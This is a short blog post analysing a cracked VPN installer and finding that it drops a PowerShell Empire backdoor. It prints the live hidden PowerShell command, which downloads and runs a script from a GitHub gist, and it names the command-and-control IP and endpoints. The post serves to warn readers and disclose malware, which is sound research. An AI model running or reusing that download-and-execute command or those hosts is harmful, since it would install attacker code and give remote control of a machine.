full screen background image
Search
Monday 11 December 2017
  • :
  • :

Malware research/reverse – Payload backdoor

Hello.
I have some free time and I try to deal with internet safety. I’m just a small drop of the ocean, but I’m here!
Today I will introduce you something different.
As usual, I downloaded a few softwares and started the analysis.
I have a ”great offer”:
Hotspot Shield VPN 7.20.8.Elite Cracked

Woooow!!!(just kidding)

We have 3 important files.
Setup.exe and Update.exe appear to be archived files and from previous posts we know what this means, but today our target is the HSS v.2.exe file.

 

It is noticed that it is the latest file created.

Also, the installation method requires using this file.

OK.Let’s scan this time!

Virus Total Report

20/68 detection?!?
I mean, only 20 of the antivirus applications will see this file as a virus.

OK. It’s normal to be seen by antivirus. It’s just a crack, a patch, etc. You have to disable the antivirus to install it, it’s just a pirated software.

Let’s get started

It looks like this .exe is actually a .rar archive

After opening, he has a lot of work in the background.
We let him do the job to find out what he is doing!

When everything is quiet, we see that something is left to work.

powershell.exe -nop -windowstyle Hidden -c “IEX (New-Object Net.WebClient).DownloadString(‘https://gist.githubusercontent.com/hampros2/7d71db98acfeaa75ec89dcb53eb796c1/raw/9681d583be4c36977286b8171be930b0fd702a64/fuck.ps1

The virus runs through the application Powershell.exe, being connected to external sources.

h**ps://sgist.githubusercontent.com/hampros2/7d71db98acfeaa75ec89dcb53eb796c1raw9681d583be4c36977286b8171be930b0fd702a64/fuck.ps1

Also connectiong to:

http://83.251.132.4

/admin/get.php

/login/process.php

/news.php

After investigation I found out that it’s about a payload project.

Currently Empire Power Shell has the following categories for modules:

  • Code Execution – Ways to run more code
  • Collection – Post exploitation data collection
  • Credentials – Collect and use creds
  • Exfiltration – Identify egress channels
  • Lateral Movement – Move around the network
  • Management – Host management and auxilary
  • Persistence – Survive reboots
  • Privesc – Privilege escalation capabilities
  • Recon – Test further entry points (HTTP Basic Auth etc)
  • Situational Awareness – Network awareness
  • Trollsploit – For the lulz

Prodefence.org

What can I say …. be careful!

Have fun & stay safe!!!

Reviews

  • 8
  • 8
  • 8
  • 7
  • 8
  • 7.8

    Score



Alex Anghelus

Cyber Security, Pentesting & Ethical Hacking Freelancer –
Malware Reverse Engineering Researcher


2 thoughts on “Malware research/reverse – Payload backdoor

Leave a Reply

Your email address will not be published. Required fields are marked *